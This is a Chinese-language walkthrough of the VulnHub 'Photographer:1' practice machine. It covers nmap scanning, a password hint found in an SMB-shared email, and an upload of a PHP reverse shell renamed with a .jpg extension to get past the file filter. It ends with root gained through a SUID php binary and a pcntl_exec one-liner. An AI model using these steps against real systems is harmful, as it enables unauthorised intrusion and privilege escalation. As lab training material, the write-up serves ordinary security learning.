vulhub——Photographer:1

目录

信息收集

SMB共享服务

访问80端口

访问8000 端口

目录遍历

文件上传

提权


下载链接:https://download.vulnhub.com/photographer/Photographer.ova

信息收集

vulhub——Photographer:1_第1张图片

root@kali:~# nmap -sC 192.168.243.155 --script=vuln
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-11 22:37 EDT
Nmap scan report for 192.168.243.155
Host is up (0.000080s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
80/tcp   open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.243.155
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.243.155:80/elements.html
|     Form id: name
|     Form action: #
|     
|     Path: http://192.168.243.155:80/elements.html
|     Form id: query
|_    Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.243.155:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=M%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=S%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/js/?C=D%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/?C=S%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/?C=M%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.243.155:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
|_    http://192.168.243.155:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8000/tcp open  http-alt
| http-enum: 
|   /admin/: Possible admin folder
|   /admin/index.html: Possible admin folder
|   /app/: Potentially interesting folder
|   /content/: Potentially interesting folder
|   /error/: Potentially interesting folder
|   /home/: Potentially interesting folder
|_  /index/: Potentially interesting folder
|_http-passwd: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:FB:21:5E (VMware)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.

SMB共享服务

vulhub——Photographer:1_第2张图片

vulhub——Photographer:1_第3张图片

Message-ID: <[email protected]>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi 
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)

访问80端口

vulhub——Photographer:1_第4张图片

访问8000 端口

vulhub——Photographer:1_第5张图片

 

https://www.exploit-db.com/exploits/48706

目录遍历

vulhub——Photographer:1_第6张图片

邮箱应该就是[email protected],密码猜测是babygirl

文件上传

vulhub——Photographer:1_第7张图片 

root@kali:/usr/share/webshells/php# cp php-reverse-shell.php /cheying.php.jpg

修改信息上传木马

反弹shell

vulhub——Photographer:1_第8张图片

vulhub——Photographer:1_第9张图片 

vulhub——Photographer:1_第10张图片

提权

/usr/bin/php7.2

www-data@photographer:/home/daisa$ find / -perm -4000 2>/dev/null

使用php命令提权

/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"

vulhub——Photographer:1_第11张图片

你可能感兴趣的:(安全测试类,信息安全)